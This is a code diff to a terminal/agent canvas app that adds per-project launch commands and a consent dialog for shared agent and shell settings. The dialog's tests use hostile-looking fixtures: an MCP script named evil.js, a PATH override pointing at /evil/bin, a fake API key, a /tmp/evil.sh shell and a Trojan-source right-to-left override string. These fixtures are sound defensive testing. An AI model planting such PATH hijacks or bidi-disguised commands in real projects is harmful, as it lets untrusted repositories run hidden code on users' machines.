+  // open) the first time it asks. Fire-and-forget: `ensureProjectLaunchInfo` never rejects and is
+  // bounded on its own.
+  useEffect(() => {
+    if (!activeProjectId) return
+    void ensureProjectLaunchInfo(activeProjectId)
+  }, [activeProjectId])
+
+  // `project-trust:changed` (Task 2 emits it once a family is approved/revoked): drop the stale
+  // verdict and re-warm immediately, so a launch right after answering the consent dialog sees the
+  // new trust state instead of the pre-approval snapshot. Mount-once — the subscription itself is
+  // not per-project (the payload carries the id), unlike `projectSetup.onEvent`.
+  useEffect(() => {
+    return window.nodeTerminal.projectSettings.onTrustChanged(({ projectId }) => {
+      invalidateProjectLaunchInfo(projectId)
+      void ensureProjectLaunchInfo(projectId)
+    })
+  }, [])
 
   // Debounced auto-save for canvas edits. Suppressed while a conflict bar is up: the bar only ever
   // appears WHILE dirty, so without this gate the 800ms timer would fire and silently "keep mine"

--- a/src/renderer/canvas/Canvas.tsx
+++ b/src/renderer/canvas/Canvas.tsx
@@ -309,7 +309,6 @@ import { pushSessionRename } from '../lib/sessionRename'
 import { oneLine } from '@shared/one-line'
 import { parseLenses, verifyLensPrompt, verifySynthesisPrompt } from '../lib/verifyPanel'
 import { useSettings } from '../state/settings'
-import { launchableDefaultAgent } from '../state/agentAvailability'
 import { activePermissionMode } from '../state/permissionMode'
 import { useContextWindow } from '../state/contextWindow'
 import { useSessionNaming } from '../state/sessionNaming'
@@ -390,6 +389,7 @@ import {
   reparentNode,
   selectedRootIds,
   resolveNewNodeAccount,
+  resolveNewNodeAgent,
   accountsForProject,
   sshAccountsHint,
   ungroupNodes,
@@ -3502,7 +3502,10 @@ export function Canvas() {
           prompt,
           undefined,
           account,
-          activePermissionMode()
+          activePermissionMode(),
+          // The owning project, for its own `.nodeterm/settings.json` launch command — the same
+          // project the account/cwd above are resolved from.
+          activeProjectId
         )
       ])
       markDirty()
@@ -3702,7 +3705,10 @@ export function Canvas() {
           initialPrompt,
           project?.ssh,
           account,
-          activePermissionMode(agentId)
+          activePermissionMode(agentId),
+          // Same funnel as the account above: the active project owns the node, so its own
+          // `.nodeterm/settings.json` launch command layers over the global one.
+          activeProjectId
         )
         return [...ns, groupId ? parentInto(node, groupId) : node]
       })
@@ -3722,7 +3728,13 @@ export function Canvas() {
       const at = spawnTeamDialog?.at
       setSpawnTeamDialog(null)
       addAgentNode(
-        useSettings.getState().settings.defaultAgent ?? 'claude',
+        // No explicit pick here — the conductor opens on whatever this project calls its default
+        // agent (`.nodeterm/settings.json` → agents.defaultAgentId), else the global one.
+        resolveNewNodeAgent(
+          undefined,
+          useProjects.getState().activeProjectId,
+          useSettings.getState().settings
+        ),
         at,
         undefined,
         undefined,
@@ -3774,9 +3786,16 @@ export function Canvas() {
         addTerminal()
       } else if (k === 'c' && e.shiftKey) {
         e.preventDefault()
-        // launchableDefaultAgent, not the raw setting: a default naming a since-removed custom
-        // agent would otherwise type its bare `custom:<uuid>` id into the new node's shell.
-        addAgentNode(launchableDefaultAgent(useSettings.getState().settings))
+        // resolveNewNodeAgent, not the raw setting: this project's own default agent wins, and a
+        // default naming a since-removed custom agent would otherwise type its bare
+        // `custom:<uuid>` id into the new node's shell (it guards that, like launchableDefaultAgent).
+        addAgentNode(
+          resolveNewNodeAgent(
+            undefined,
+            useProjects.getState().activeProjectId,
+            useSettings.getState().settings
+          )
+        )
       }
     }
     window.addEventListener('keydown', onKey)
@@ -5154,7 +5173,9 @@ export function Canvas() {
         ...copy.data,
         // Built fresh here (never re-wrapping a persisted command), so it is flagged exactly once.
         initialCommand: withPermissionMode(
-          `${claudeLaunchCommand()} -r ${originalId}`,
+          // The branched copy stays in the project it was branched from, so it comes back through
+          // that project's wrapper exactly like the source node did.
+          `${claudeLaunchCommand(useProjects.getState().activeProjectId)} -r ${originalId}`,
           'claude',
           activePermissionMode()
         ),
@@ -5233,7 +5254,10 @@ export function Canvas() {
         source.data.accountId,
         // The mode belongs to the node being OPENED, so it is gated on the TARGET agent — a
         // handoff into grok must not inherit claude's version gate.
-        activePermissionMode(targetAgentId)
+        activePermissionMode(targetAgentId),
+        // The transfer target lands in the active project's canvas, so that project's launch
+        // command applies to it — the same project `projectSsh` was just resolved from.
+        activeProjectId
       )
       node.selected = true
       const placed = placeSpawned(node, at ?? besideNode(source))
@@ -6418,7 +6442,9 @@ export function Canvas() {
                   project,
                   useSettings.getState().settings.claudeAccounts
                 ),
-                activePermissionMode(choice.agentId)
+                activePermissionMode(choice.agentId),
+                // Board-created nodes belong to the active project like any other.
+                activeProjectId
               )
       setNodes((ns) => [...ns, node])
       const board = project?.kanban ?? seedBoard
@@ -6536,10 +6562,22 @@ export function Canvas() {
         focusNodeById(boundNodeId)
         return
       }
-      // No live node — open a resume node in the active project, using the transcript's cwd.
-      const cmd = resumeCommand('claude', hit.sessionId, false, agentLaunchOverride('claude'))
+      // No live node — open a resume node in the active project, using the transcript's cwd. The
+      // resume line goes through that project's launch command, like every other launch it owns.
+      const activeId = useProjects.getState().activeProjectId
+      const cmd = resumeCommand('claude', hit.sessionId, false, agentLaunchOverride('claude', activeId))
       if (!cmd) return
-      const node = createAgentNode('claude', nodesRef.current.length, hit.cwd, viewCenter())
+      const node = createAgentNode(
+        'claude',
+        nodesRef.current.length,
+        hit.cwd,
+        viewCenter(),
+        undefined,
+        undefined,
+        undefined,
+        undefined,
+        activeId
+      )
       // The resume command replaces (never wraps) the factory's command, so it is flagged once.
       node.data = {
         ...node.data,
@@ -7149,7 +7187,10 @@ export function Canvas() {
                   args.prompt,
                   sshFor(agentCwd),
                   account,
-                  activePermissionMode(agentId)
+                  activePermissionMode(agentId),
+                  // Same project the account funnel above resolves from: the canvas the verb runs
+                  // on, whose `.nodeterm/settings.json` launch command applies to what it opens.
+                  projStore.activeProjectId
                 ),
                 after ?? [],
                 undefined,
@@ -7494,7 +7535,8 @@ export function Canvas() {
                 }),
                 sshFor(targetCwd),
                 vAccount,
-                vMode
+                vMode,
+                vStore.activeProjectId
               )
               return armAfter(
                 { ...node, data: { ...node.data, title: `Verify: ${lens}`, titleAuto: false } },
@@ -7518,7 +7560,8 @@ export function Canvas() {
                       }),
                       sshFor(targetCwd),
                       vAccount,
-                      vMode
+                      vMode,
+                      vStore.activeProjectId
                     )
                     return { ...j, data: { ...j.data, title: 'Verify: verdict', titleAuto: false } }
                   })(),
@@ -7606,7 +7649,8 @@ export function Canvas() {
                 r.prompt,
                 sshFor(srcCwd),
                 teamAccount,
-                activePermissionMode(memberAgent)
+                activePermissionMode(memberAgent),
+                teamStore.activeProjectId
               )
               return r.title ? { ...node, data: { ...node.data, title: r.title, titleAuto: false } } : node
             })

--- a/src/renderer/components/SetupConsentDialog.test.tsx
+++ b/src/renderer/components/SetupConsentDialog.test.tsx
@@ -14,7 +14,7 @@
 import { describe, it, expect, beforeEach, afterEach, vi } from 'vitest'
 import { act } from 'react'
 import { createRoot, type Root } from 'react-dom/client'
-import type { ProjectSetupConsentRequest } from '@shared/project-settings'
+import type { ProjectConsentRequest, ProjectSetupConsentRequest } from '@shared/project-settings'
 import { CONFIRM_ARM_MS } from './confirm-key'
 import { SETUP_LABEL_MAX, SetupConsentDialog } from './SetupConsentDialog'
 
@@ -307,5 +307,147 @@ describe('SetupConsentDialog', () => {
     expect(offDismiss).toHaveBeenCalledTimes(1)
     // The afterEach unmount must stay harmless.
     root = createRoot(host)
+  })
+})
+
+/**
+ * The same dialog, the other two trust families. `agents` (launchCmd + env) and `shell` (the
+ * terminal program) are approved by the same one-answer machinery, so everything asserted above
+ * about answering still holds; what is asserted here is that the CONTENT being approved is on
+ * screen, verbatim and bidi-pinned, the way the script bodies are.
+ */
+describe('SetupConsentDialog — agents/shell trust variants', () => {
+  // The file's shared emitter is typed to the setup shape; main sends the tagged union over that
+  // same channel. One cast here rather than a second harness.
+  const emit = (req: ProjectConsentRequest): void =>
+    (emitRequest as unknown as (r: ProjectConsentRequest) => void)(req)
+
+  const agents = (over: Partial<Extract<ProjectConsentRequest, { family: 'agents' }>> = {}): ProjectConsentRequest => ({
+    family: 'agents',
+    requestId: 'req-a',
+    projectName: 'cloned-repo',
+    locationLabel: '~/code/cloned-repo',
+    previouslyApproved: false,
+    launchCmd: 'claude --mcp ./evil.js',
+    env: { API_KEY: 'sk-live-1', PATH: '/evil/bin:/usr/bin' },
+    ...over
+  })
+
+  const shell = (over: Partial<Extract<ProjectConsentRequest, { family: 'shell' }>> = {}): ProjectConsentRequest => ({
+    family: 'shell',
+    requestId: 'req-s',
+    projectName: 'cloned-repo',
+    locationLabel: '~/code/cloned-repo',
+    previouslyApproved: false,
+    shell: '/tmp/evil.sh',
+    ...over
+  })
+
+  const envRows = (): HTMLElement[] => [...document.querySelectorAll<HTMLElement>('.confirm [data-env-key]')]
+  const launchCmd = (): HTMLElement | null => document.querySelector<HTMLElement>('.confirm pre[data-launch-cmd]')
+
+  it('shows the launch command and EVERY env var — that whole set is what one answer covers', () => {
+    mount()
+    act(() => emit(agents()))
+    expect(text()).toContain('cloned-repo')
+    expect(launchCmd()!.textContent).toBe('claude --mcp ./evil.js')
+    expect(envRows().map((r) => r.textContent)).toEqual([
+      'API_KEY=sk-live-1',
+      'PATH=/evil/bin:/usr/bin'
+    ])
+  })
+
+  it('pins the approved bytes to byte order — command AND env values (Trojan source)', () => {
+    mount()
+    // Written as \u escapes on purpose (see the label test above): a raw bidi byte in a source
+    // file is invisible to git and ripgrep.
+    const rtl = String.fromCharCode(0x202e) // U+202E RIGHT-TO-LEFT OVERRIDE
+    const cmd = `sh${rtl}# nur`
+    const val = `x${rtl}y`
+    act(() => emit(agents({ launchCmd: cmd, env: { A: val } })))
+    // Verbatim: these are the bytes being approved, so nothing is stripped or truncated.
+    expect(launchCmd()!.textContent).toBe(cmd)
+    expect(launchCmd()!.style.unicodeBidi).toBe('bidi-override')
+    // The whole row is pinned, key included — the dialog must not lean on the sanitizer's key
+    // charset for its display order to match its bytes.
+    const row = envRows()[0]
+    expect(row.querySelector<HTMLElement>('[data-env-value]')!.textContent).toBe(val)
+    expect(row.style.unicodeBidi).toBe('bidi-override')
+    expect(row.style.direction).toBe('ltr')
+  })
+
+  it('omits the halves the family does not set', () => {
+    mount()
+    act(() => emit(agents({ env: undefined })))
+    expect(envRows()).toHaveLength(0)
+    expect(launchCmd()).toBeTruthy()
+    act(() => emitDismiss({ requestId: 'req-a' }))
+    act(() => emit(agents({ requestId: 'req-a2', launchCmd: undefined, env: { ONLY: 'x' } })))
+    expect(launchCmd()).toBeNull()
+    expect(envRows().map((r) => r.textContent)).toEqual(['ONLY=x'])
+  })
+
+  it('answers through the same one-answer path, and Escape still submits NOTHING', () => {
+    mount()
+    act(() => emit(agents()))
+    const approve = button('Approve')
+    act(() => {
+      approve.click()
+      approve.click()
+    })
+    expect(consent).toHaveBeenCalledTimes(1)
+    expect(consent).toHaveBeenCalledWith('req-a', 'approve')
+
+    act(() => emit(shell()))
+    act(() => {
+      window.dispatchEvent(new KeyboardEvent('keydown', { key: 'Escape' }))
+    })
+    expect(dialog()).toBeNull()
+    expect(consent).toHaveBeenCalledTimes(1)
+  })
+
+  it('the shell variant shows the bare program', () => {
+    mount()
+    act(() => emit(shell()))
+    const pre = document.querySelector<HTMLElement>('.confirm pre[data-shell]')!
+    expect(pre.textContent).toBe('/tmp/evil.sh')
+    expect(pre.style.unicodeBidi).toBe('bidi-override')
+    act(() => button('Skip').click())
+    expect(consent).toHaveBeenCalledWith('req-s', 'skip')
+  })
+
+  it('says the settings CHANGED when a previous approval exists', () => {
+    mount()
+    act(() => emit(agents({ previouslyApproved: true })))
+    expect(text().toLowerCase()).toContain('changed since you approved')
+  })
+
+  it('renders a TAGGED setup request exactly as the untagged one — the tag changed nothing', () => {
+    mount()
+    act(() =>
+      emit({
+        family: 'setup',
+        requestId: 'req-t',
+        kind: 'setup',
+        projectName: 'cloned-repo',
+        locationLabel: '~/code/cloned-repo',
+        scripts: { setup: 'npm install' },
+        previouslyApproved: false
+      })
+    )
+    expect(scripts()).toHaveLength(1)
+    expect(scripts()[0].textContent).toBe('npm install')
+    expect(button('Run once')).toBeTruthy()
+  })
+
+  it('IGNORES a request whose family it does not know — never a dialog over unrendered content', () => {
+    mount()
+    // Fail closed: a variant this build cannot render must not be approvable through a dialog that
+    // shows the user nothing of what it covers.
+    act(() => emit({ family: 'worktree', requestId: 'req-x' } as unknown as ProjectConsentRequest))
+    expect(dialog()).toBeNull()
+    // …and it does not block the queue for a request that IS renderable.
+    act(() => emit(shell()))
+    expect(dialog()).toBeTruthy()
   })
 })

--- a/src/renderer/components/SetupConsentDialog.tsx
+++ b/src/renderer/components/SetupConsentDialog.tsx
@@ -1,5 +1,6 @@
 import { useEffect, useRef, useState } from 'react'
 import type {
+  ProjectConsentRequest,
   ProjectSetupConsentAnswer,
   ProjectSetupConsentRequest,
   ProjectSetupKind
@@ -75,6 +76,20 @@ function safeLabel(raw: string): string {
 
 const KIND_LABEL: Record<ProjectSetupKind, string> = { setup: 'Setup', archive: 'Archive' }
 
+/**
+ * The pin that defeats Trojan-source reordering on APPROVED BYTES (a script body, a launch command,
+ * an env value, a shell path): it forces the DISPLAY order to the byte order, so a U+202E inside
+ * the content cannot make the reader see a different program than the one that will run. It alters
+ * nothing about the bytes themselves — which is the point: these are shown so they can be approved.
+ */
+const BIDI_PIN: React.CSSProperties = { unicodeBidi: 'bidi-override', direction: 'ltr' }
+
+/** The scroll box every approved-bytes block sits in. Carries NO conflicting utility (no border
+ *  colour, no whitespace mode): each use adds its own, so two Tailwind classes of the same family
+ *  never race — the winner of that race is stylesheet order, not string order. */
+const APPROVED_BOX =
+  'max-h-40 overflow-auto break-words rounded-md border bg-bg px-2.5 py-2 font-mono text-[12px] leading-relaxed text-text'
+
 /** The family's scripts, the one about to run FIRST, skipping the ones the family does not set. */
 function orderedScripts(req: ProjectSetupConsentRequest): { kind: ProjectSetupKind; body: string }[] {
   const order: ProjectSetupKind[] = req.kind === 'archive' ? ['archive', 'setup'] : ['setup', 'archive']
@@ -83,10 +98,23 @@ function orderedScripts(req: ProjectSetupConsentRequest): { kind: ProjectSetupKi
     .filter((s): s is { kind: ProjectSetupKind; body: string } => s.body !== undefined)
 }
 
+/**
+ * Which variant's content this request carries, or `null` for one this build cannot render.
+ *
+ * An untagged payload is the SETUP request — the only variant that predates the tag — so an older
+ * main is still answered correctly. An unknown tag is refused outright rather than rendered as the
+ * nearest variant: the whole point of this dialog is that nothing is approved that was not on
+ * screen, and a payload whose content this build cannot lay out is content it cannot show.
+ */
+function familyOf(req: ProjectConsentRequest): ProjectConsentRequest['family'] | null {
+  const tag = (req as { family?: string }).family ?? 'setup'
+  return tag === 'setup' || tag === 'agents' || tag === 'shell' ? tag : null
+}
+
 export function SetupConsentDialog(): React.JSX.Element | null {
   // A QUEUE, not a single request: two projects (or a run and a worktree archive) can ask at once,
   // and answering one must not lose the other. The head is the one on screen.
-  const [queue, setQueue] = useState<ProjectSetupConsentRequest[]>([])
+  const [queue, setQueue] = useState<ProjectConsentRequest[]>([])
   // Request ids already answered from here. Belt-and-braces against a double click landing before
   // the re-render drops the head — main treats an unknown/stale id as a no-op, but a second answer
   // must never leave this component in the first place.
@@ -95,6 +123,9 @@ export function SetupConsentDialog(): React.JSX.Element | null {
   useEffect(() => {
     const api = window.nodeTerminal.projectSetup
     const offRequest = api.onConsentRequest((req) => {
+      // Unrenderable variants never enter the queue at all — they must neither raise a dialog nor
+      // block the ones behind them (see `familyOf`).
+      if (!familyOf(req)) return
       setQueue((q) => (q.some((r) => r.requestId === req.requestId) ? q : [...q, req]))
     })
     // main answered (or expired) this one itself — drop it, silently and without submitting.
@@ -123,6 +154,118 @@ export function SetupConsentDialog(): React.JSX.Element | null {
   const name = safeLabel(head.projectName)
   const location = safeLabel(head.locationLabel)
 
+  // Per variant: the question, the grant button's wording, and the content the answer covers. The
+  // `setup` arm is the fallback, so an untagged (older-main) payload renders exactly as before.
+  const view =
+    head.family === 'agents'
+      ? {
+          message: `Use the shared agent launch settings for "${name}"?`,
+          confirmLabel: 'Approve',
+          changed: 'These settings have changed since you approved them for this project.',
+          intro: (
+            <>
+              They come from the project&apos;s shared <code>.nodeterm/settings.json</code>, so anyone
+              who can commit to the repo can change them. One answer covers the launch command and
+              every variable below.
+            </>
+          ),
+          detail: (
+            <>
+              {head.launchCmd !== undefined ? (
+                <div className="space-y-1">
+                  <p className="text-[12px] font-semibold text-text">Launch command</p>
+                  {/* Text child, never markup — and never truncated: this is what is approved. */}
+                  <pre
+                    style={BIDI_PIN}
+                    data-launch-cmd=""
+                    className={`${APPROVED_BOX} whitespace-pre-wrap border-accent`}
+                  >
+                    {head.launchCmd}
+                  </pre>
+                </div>
+              ) : null}
+              {head.env ? (
+                <div className="space-y-1">
+                  <p className="text-[12px] font-semibold text-text">Environment</p>
+                  {/* Every pair, verbatim: an env var is code's blast radius (PATH/LD_PRELOAD), so
+                      it is inside the hash and must be inside the question. The whole ROW is pinned
+                      to byte order, key included — a `KEY=value` line that renders in some other
+                      order than its bytes is the same Trojan-source problem as a reordered script,
+                      and this dialog must not depend on the sanitizer's key charset to be safe. */}
+                  <div className={`${APPROVED_BOX} border-accent`}>
+                    {Object.entries(head.env).map(([key, value]) => (
+                      <div key={key} data-env-key={key} style={BIDI_PIN} className="break-all">
+                        <span className="text-muted">{key}=</span>
+                        <span data-env-value="">{value}</span>
+                      </div>
+                    ))}
+                  </div>
+                </div>
+              ) : null}
+            </>
+          )
+        }
+      : head.family === 'shell'
+        ? {
+            message: `Use the shared terminal shell for "${name}"?`,
+            confirmLabel: 'Approve',
+            changed: 'This setting has changed since you approved it for this project.',
+            intro: (
+              <>
+                It comes from the project&apos;s shared <code>.nodeterm/settings.json</code>, so anyone
+                who can commit to the repo can change it. Every terminal you open for this project
+                starts this program.
+              </>
+            ),
+            detail: (
+              <div className="space-y-1">
+                <p className="text-[12px] font-semibold text-text">Shell</p>
+                <pre
+                  style={BIDI_PIN}
+                  data-shell=""
+                  className={`${APPROVED_BOX} whitespace-pre-wrap border-accent`}
+                >
+                  {head.shell}
+                </pre>
+              </div>
+            )
+          }
+        : {
+            message: `Run the ${KIND_LABEL[head.kind].toLowerCase()} script for "${name}"?`,
+            confirmLabel: 'Run once',
+            changed: 'These scripts have changed since you approved them for this project.',
+            intro: (
+              <>
+                They come from the project&apos;s shared <code>.nodeterm/settings.json</code>, so
+                anyone who can commit to the repo can change them. One answer covers both.
+              </>
+            ),
+            detail: (
+              <>
+                {orderedScripts(head).map((s) => (
+                  <div key={s.kind} className="space-y-1">
+                    <p className="text-[12px] font-semibold text-text">
+                      {KIND_LABEL[s.kind]} script{s.kind === head.kind ? ' (about to run)' : ''}
+                    </p>
+                    {/* Text child, never markup — and never truncated: this is what is being
+                        approved. `BIDI_PIN` pins the DISPLAY order to the byte order, so a U+202E in
+                        the script cannot make the reader see a different program than the one that
+                        will run (Trojan source). It changes nothing about the bytes themselves. */}
+                    <pre
+                      style={BIDI_PIN}
+                      data-script-kind={s.kind}
+                      className={`max-h-40 overflow-auto whitespace-pre-wrap break-words rounded-md border px-2.5 py-2 font-mono text-[12px] leading-relaxed text-text ${
+                        s.kind === head.kind ? 'border-accent bg-bg' : 'border-border bg-bg opacity-80'
+                      }`}
+                    >
+                      {s.body}
+                    </pre>
+                  </div>
+                ))}
+              </>
+            )
+          }
+
   return (
     <ConfirmDialog
       // Keyed per request: the next prompt in the queue must be a FRESH dialog — its own
@@ -133,40 +276,16 @@ export function SetupConsentDialog(): React.JSX.Element | null {
         <div className="confirm__msg space-y-2">
           <p className="text-[13px] text-muted">{location}</p>
           {head.previouslyApproved ? (
-            <p className="text-[13px] text-[color:var(--warn)]">
-              These scripts have changed since you approved them for this project.
-            </p>
+            <p className="text-[13px] text-[color:var(--warn)]">{view.changed}</p>
           ) : null}
-          <p className="text-[13px] text-muted">
-            They come from the project&apos;s shared <code>.nodeterm/settings.json</code>, so anyone
-            who can commit to the repo can change them. One answer covers both.
-          </p>
-          {orderedScripts(head).map((s) => (
-            <div key={s.kind} className="space-y-1">
-              <p className="text-[12px] font-semibold text-text">
-                {KIND_LABEL[s.kind]} script{s.kind === head.kind ? ' (about to run)' : ''}
-              </p>
-              {/* Text child, never markup — and never truncated: this is what is being approved.
-                  `bidi-override`/`ltr` pins the DISPLAY order to the byte order, so a U+202E in the
-                  script cannot make the reader see a different program than the one that will run
-                  (Trojan source). It changes nothing about the bytes themselves. */}
-              <pre
-                style={{ unicodeBidi: 'bidi-override', direction: 'ltr' }}
-                data-script-kind={s.kind}
-                className={`max-h-40 overflow-auto whitespace-pre-wrap break-words rounded-md border px-2.5 py-2 font-mono text-[12px] leading-relaxed text-text ${
-                  s.kind === head.kind ? 'border-accent bg-bg' : 'border-border bg-bg opacity-80'
-                }`}
-              >
-                {s.body}
-              </pre>
-            </div>
-          ))}
+          <p className="text-[13px] text-muted">{view.intro}</p>
+          {view.detail}
         </div>
       }
-      message={`Run the ${KIND_LABEL[head.kind].toLowerCase()} script for "${name}"?`}
-      confirmLabel="Run once"
+      message={view.message}
+      confirmLabel={view.confirmLabel}
       cancelLabel="Skip"
-      // "Run once" is the grant, so it carries the danger styling; no button takes focus.
+      // The confirm button is the grant, so it carries the danger styling; no button takes focus.
       danger
       enterConfirms={false}
       autoFocusButtons={false}

--- a/src/renderer/components/kanban/ModalTerminal.tsx
+++ b/src/renderer/components/kanban/ModalTerminal.tsx
@@ -32,7 +32,12 @@ import {
   CO_ATTACH_MOUSE_SEQ
 } from '../../terminal/terminal-config'
 import { useXtermVisualSettings } from '../../terminal/useXtermVisualSettings'
-import { resolveSshRemote, reportSshDrop, sshConnectionScope } from '../../nodes/TerminalNode'
+import {
+  owningProjectId,
+  resolveSshRemote,
+  reportSshDrop,
+  sshConnectionScope
+} from '../../nodes/TerminalNode'
 import { buildSshArgs, type SshConnection } from '@shared/ssh'
 
 /** The subset of a node's `data` a SECOND client needs to attach to its session the same way the
@@ -90,7 +95,11 @@ export function ModalTerminal({ nodeId, spawn, searchOpen, onCloseSearch }: Moda
   const transportRef = useRef<LocalTransport | null>(null)
   const agentSessionId = useAgentStatus((s) => s.byId[nodeId]?.sessionId)
   // One shallow-compared subscription for the whole appearance slice — see useXtermVisualSettings.
-  const visual = useXtermVisualSettings()
+  // MIRROR TerminalNode: scoped to the OWNING project (`owningProjectId`, the active one — a modal
+  // only ever opens over it), deliberately NOT this card's connection scope. `sshConnectionScope`
+  // answers a project×host attachment id for a session on a foreign host, which names no project at
+  // all — the per-project appearance would silently vanish for exactly those cards.
+  const visual = useXtermVisualSettings(owningProjectId())
   const [dropping, setDropping] = useState(false)
   const [uploading, setUploading] = useState(false)
   // Same copy feedback as the canvas node — a copy here is the same act as a copy there, including

--- a/src/renderer/components/settings/ProjectSettingsFamilies.tsx
+++ b/src/renderer/components/settings/ProjectSettingsFamilies.tsx
@@ -10,7 +10,9 @@ import type {
 } from '@shared/project-settings'
 import { Button } from '@renderer/ui/Button'
 import { Input } from '@renderer/ui/Input'
+import { Select } from '@renderer/ui/Select'
 import { Switch } from '@renderer/ui/Switch'
+import { isKnownTerminalThemeId, TERMINAL_THEMES } from '@renderer/terminal/themes'
 import { useProjectSetup } from '../../state/projectSetup'
 import { useSettingsSearch } from './context'
 import { FieldRow } from './FieldRow'
@@ -28,7 +30,7 @@ import { matchesQuery, type SettingsSearchEntry } from './search'
  * would have pushed that file well past ~400 lines.
  */
 
-type FieldKind = 'input' | 'textarea' | 'switch' | 'env' | 'list'
+type FieldKind = 'input' | 'textarea' | 'switch' | 'env' | 'list' | 'theme'
 
 interface FieldConfig {
   key: string
@@ -49,7 +51,12 @@ const FAMILY_CONFIG: Record<ProjectSettingsFamily, FamilyConfig> = {
       {
         key: 'setupScript',
         label: 'Setup script',
-        description: 'Runs once when a worktree for this project is created.',
+        // Not only "when a worktree is created": `attachWorktree` is the single post-bind point, so
+        // adopting an existing worktree and re-binding one to a group run it too (as does the failed
+        // chip's Re-run). A script written for a fresh checkout only, and re-run over a working one,
+        // is the kind of surprise the row itself has to warn about.
+        description:
+          'Runs when a worktree for this project is created, adopted, or re-bound to a group.',
         kind: 'textarea'
       },
       {
@@ -60,7 +67,13 @@ const FAMILY_CONFIG: Record<ProjectSettingsFamily, FamilyConfig> = {
       },
       {
         key: 'waitForSetup',
-        label: 'Wait for setup to finish before opening a terminal',
+        // The old label ("…before opening a terminal") promised something this switch never did:
+        // the terminal opens immediately either way. What waits is the node's QUEUED LAUNCH COMMAND
+        // (`launchesToFire`'s setup gate) — the agent command must not race an `npm ci` still
+        // writing node_modules under it.
+        label: 'Hold queued launch commands until the setup script finishes',
+        description:
+          'Nodes opened into a new worktree still open right away; only their queued command waits.',
         kind: 'switch'
       }
     ]
@@ -110,8 +123,21 @@ const FAMILY_CONFIG: Record<ProjectSettingsFamily, FamilyConfig> = {
     title: 'Terminal',
     fields: [
       { key: 'shell', label: 'Shell', kind: 'input' },
-      { key: 'theme', label: 'Theme', kind: 'input' },
-      { key: 'fontFamily', label: 'Font family', kind: 'input' }
+      // Neither description says the word "project": every row in this pane is a project setting,
+      // so it discriminates nothing while making the query "project" match the whole pane — the
+      // very thing `fieldEntry`'s keyword list is careful to avoid.
+      {
+        key: 'theme',
+        label: 'Theme',
+        description: 'Overrides the global terminal theme. Terminals already open repaint.',
+        kind: 'theme'
+      },
+      {
+        key: 'fontFamily',
+        label: 'Font family',
+        description: 'Overrides the global terminal font.',
+        kind: 'input'
+      }
     ]
   }
 }
@@ -289,6 +315,68 @@ function EnvField({
           onBlur={commit}
           className={textareaClass(disabled)}
         />
+      }
+    />
+  )
+}
+
+/**
+ * The terminal `theme` row: a Select over the ids this build actually ships, not a free-text box.
+ *
+ * Three properties the plain Input could not have:
+ *  - the ids are not guessable ('catppuccin-mocha', 'tokyo-night'), and a typo used to be
+ *    indistinguishable from a working value — the merge ignores an unknown id, so the terminal just
+ *    kept the global theme with nothing on screen saying why.
+ *  - the empty option is INHERIT, not "no theme": it clears the field so this machine's global
+ *    setting (or, on a local row, the shared document) decides.
+ *  - a stored id this build does not know must still READ AS ITSELF rather than silently showing as
+ *    "inherit" — same precedent as the identity pane's unknown-account option. A teammate's newer
+ *    theme name, or one since removed, is a real value sitting in a real document; presenting the
+ *    box as empty would invite a save that erases it.
+ */
+function ThemeField({
+  id,
+  label,
+  ariaLabel,
+  description,
+  note,
+  value,
+  disabled,
+  onCommit
+}: {
+  id: string
+  label: string
+  ariaLabel?: string
+  description?: string
+  note?: string
+  value: string
+  disabled?: boolean
+  onCommit: (value: string | undefined) => void
+}): React.JSX.Element {
+  const unknown = value !== '' && !isKnownTerminalThemeId(value)
+  return (
+    <FieldRow
+      label={label}
+      description={description}
+      note={note}
+      htmlFor={id}
+      control={
+        <Select
+          id={id}
+          className="w-72"
+          aria-label={ariaLabel}
+          value={value}
+          disabled={disabled}
+          onChange={(e) => onCommit(e.target.value === '' ? undefined : e.target.value)}
+        >
+          <option value="">Inherit (use this machine&rsquo;s setting)</option>
+          {TERMINAL_THEMES.map((t) => (
+            <option key={t.id} value={t.id}>
+              {t.label}
+            </option>
+          ))}
+          {unknown ? <option value={value}>{value} (not in this version)</option> : null}
+        </Select>
       }
     />
   )
@@ -672,6 +760,20 @@ function FamilySection({
         />
       )
     }
+    if (f.kind === 'theme') {
+      return (
+        <ThemeField
+          key={f.key}
+          id={id}
+          label={f.label}
+          description={f.description}
+          note={overrideNote}
+          disabled={sharedDisabled}
+          value={textOf(f.kind, sharedFamily?.[f.key])}
+          onCommit={(v) => commitShared(f.key, v)}
+        />
+      )
+    }
     return (
       <StringField
         key={f.key}
@@ -717,6 +819,21 @@ function FamilySection({
           text={formatEnvLines(localFamily?.[f.key] as Record<string, string> | undefined)}
           overrideNote={activeNote}
           onCommitValue={(v) => commitLocal(f.key, v)}
+        />
+      )
+    }
+    if (f.kind === 'theme') {
+      return (
+        <ThemeField
+          key={f.key}
+          id={id}
+          label={f.label}
+          ariaLabel={`${f.label} (this machine)`}
+          description={f.description}
+          note={activeNote}
+          disabled={localDisabled}
+          value={textOf(f.kind, localFamily?.[f.key])}
+          onCommit={(v) => commitLocal(f.key, v)}
         />
       )
     }

--- a/src/renderer/components/settings/ProjectSettingsFamilies.tsx
+++ b/src/renderer/components/settings/ProjectSettingsFamilies.tsx
@@ -378,6 +378,16 @@ const SKIP_NOTE: Record<Extract<ProjectSetupRunResult, { status: 'skipped' }>['r
 
 const RUN_LABEL: Record<ProjectSetupKind, string> = { setup: 'Run setup', archive: 'Run archive' }
 
+/**
+ * A `launchCmd` with no `defaultAgentId` beside it is INERT, and silently so — the launch layer
+ * (`workspace.ts agentLaunchOverride`) consumes a project's launch command only for the agent that
+ * project itself names, and never falls back to this machine's global default agent (that would
+ * make a shared doc type one agent's wrapper into whatever agent the local user happens to prefer).
+ * A setting that does nothing must say it does nothing, on the row where it was typed.
+ */
+export const LAUNCH_CMD_UNPAIRED_NOTE =
+  'Launch command applies only when a Default agent id is set above.'
+
 /** How a finished run reads in the badge. */
 function exitNote(state: 'done' | 'failed' | 'cancelled', exitCode: number | undefined): string {
   if (state === 'cancelled') return 'Cancelled'
@@ -616,10 +626,24 @@ function FamilySection({
     )
   }
 
+  // EFFECTIVE values (local-over-shared, `ignoreShared` respected), like the setup family's run
+  // buttons above: a launch command nothing can consume is reported wherever it was typed — on the
+  // shared row and on its "this machine" twin, since either one alone can be the value that is
+  // sitting there doing nothing. Absence of a resolved `defaultAgentId` is the whole condition;
+  // an id that resolves to no launchable agent is a different (and much louder) problem.
+  const launchCmdUnpaired =
+    family === 'agents' &&
+    resolvedFamily.launchCmd !== undefined &&
+    resolvedFamily.defaultAgentId === undefined
